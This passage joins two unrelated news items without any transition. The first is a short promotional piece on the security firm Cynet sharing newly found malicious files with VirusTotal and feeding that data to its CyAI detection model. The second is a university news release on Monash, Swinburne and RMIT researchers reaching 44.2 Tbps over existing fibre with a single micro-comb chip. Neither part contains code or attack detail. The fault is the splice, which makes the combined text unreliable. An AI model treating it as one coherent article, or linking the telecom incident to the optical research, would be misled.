For example, Cynet recently conducted an Incident Response engagement for a large telecom provider. Cynet discovered several malicious files that did not appear in the VirusTotal database.
Contributing information on these newly discovered files helps our entire industry perform better and protect businesses against cyber-attacks.
Second, Cynet will leverage intelligence in VirusTotal to inform its CyAI model in order to continuously improve its detection capabilities and accuracy.
Cynet AI is continually evolving, constantly learning new datasets in order to improve its accuracy and decrease its already-low false positive ratio. Comparing files found to be malicious by CyAI against files also found to be malicious by other providers helps to quickly validate Cynet's findings.
Researchers from Monash, Swinburne and RMIT universities have successfully tested and recorded Australia’s fastest internet data speed, and that of the world, from a single optical chip – capable of downloading 1000 high definition movies in a split second.
Published in the prestigious journal Nature Communications, these findings have the potential to not only fast-track the next 25 years of Australia’s telecommunications capacity, but also the possibility for this home-grown technology to be rolled out across the world.
In light of the pressures being placed on the world’s internet infrastructure, recently highlighted by isolation policies as a result of COVID-19, the research team led by Dr Bill Corcoran (Monash), Distinguished Professor Arnan Mitchell (RMIT) and Professor David Moss (Swinburne) were able to achieve a data speed of 44.2 Terabits per second (Tbps) from a single light source.
This technology has the capacity to support the high-speed internet connections of 1.8 million households in Melbourne, at the same time, and billions across the world during peak periods.
Demonstrations of this magnitude are usually confined to a laboratory. But, for this study, researchers achieved these quick speeds using existing communications infrastructure where they were able to efficiently load-test the network.
They used a new device that replaces 80 lasers with one single piece of equipment known as a micro-comb, which is smaller and lighter than existing telecommunications hardware. It was planted into and load-tested using existing infrastructure, which mirrors that used by the NBN.
The micro-comb chip over a A$2 coin. This tiny chip produces an infrared rainbow of light, the equivalent of 80 lasers. The ribbon to the right of the image is an array of optical fibres connected to the device. The chip itself measures about 3x5 mm.
It is the first time any micro-comb has been used in a field trial and possesses the highest amount of data produced from a single optical chip.
“We’re currently getting a sneak-peak of how the infrastructure for the internet will hold up in two to three years’ time, due to the unprecedented number of people using the internet for remote work, socialising and streaming. It’s really showing us that we need to be able to scale the capacity of our internet connections,” says Dr Bill Corcoran, co-lead author of the study and Lecturer in Electrical and Computer Systems Engineering at Monash University.
“What our research demonstrates is the ability for fibres that we already have in the ground, thanks to the NBN project, to be the backbone of communications networks now and in the future. We’ve developed something that is scalable to meet future needs.
“And it’s not just Netflix we’re talking about here – it’s the broader scale of what we use our communication networks for. This data can be used for self-driving cars and future transportation and it can help the medicine, education, finance and e-commerce industries, as well as enable us to read with our grandchildren from kilometres away.”
To illustrate the impact optical micro-combs have on optimising communication systems, researchers installed 76.6km of ‘dark’ optical fibres between RMIT’s Melbourne City Campus and Monash University’s Clayton Campus. The optical fibres were provided by Australia’s Academic Research Network.
Within these fibres, researchers placed the micro-comb – contributed by Swinburne, as part of a broad international collaboration – which acts like a rainbow made up of hundreds of high quality infrared lasers from a single chip. Each ‘laser’ has the capacity to be used as a separate communications channel.
Researchers were able to send maximum data down each channel, simulating peak internet usage, across 4THz of bandwidth.
Distinguished Professor Mitchell said reaching the optimum data speed of 44.2 Tbps showed the potential of existing Australian infrastructure. The future ambition of the project is to scale up the current transmitters from hundreds of gigabytes per second towards tens of terabytes per second without increasing size, weight or cost.
“Long-term, we hope to create integrated photonic chips that could enable this sort of data rate to be achieved across existing optical fibre links with minimal cost,” Distinguished Professor Mitchell says.
“Initially, these would be attractive for ultra-high speed communications between data centres. However, we could imagine this technology becoming sufficiently low cost and compact that it could be deployed for commercial use by the general public in cities across the world.”
Professor Moss, Director of the Optical Sciences Centre at Swinburne, says: “In the 10 years since I co-invented micro-comb chips, they have become an enormously important field of research.
“It is truly exciting to see their capability in ultra-high bandwidth fibre optic telecommunications coming to fruition. This work represents a world-record for bandwidth down a single optical fibre from a single chip source, and represents an enormous breakthrough for part of the network which does the heaviest lifting. Micro-combs offer enormous promise for us to meet the world’s insatiable demand for bandwidth.”
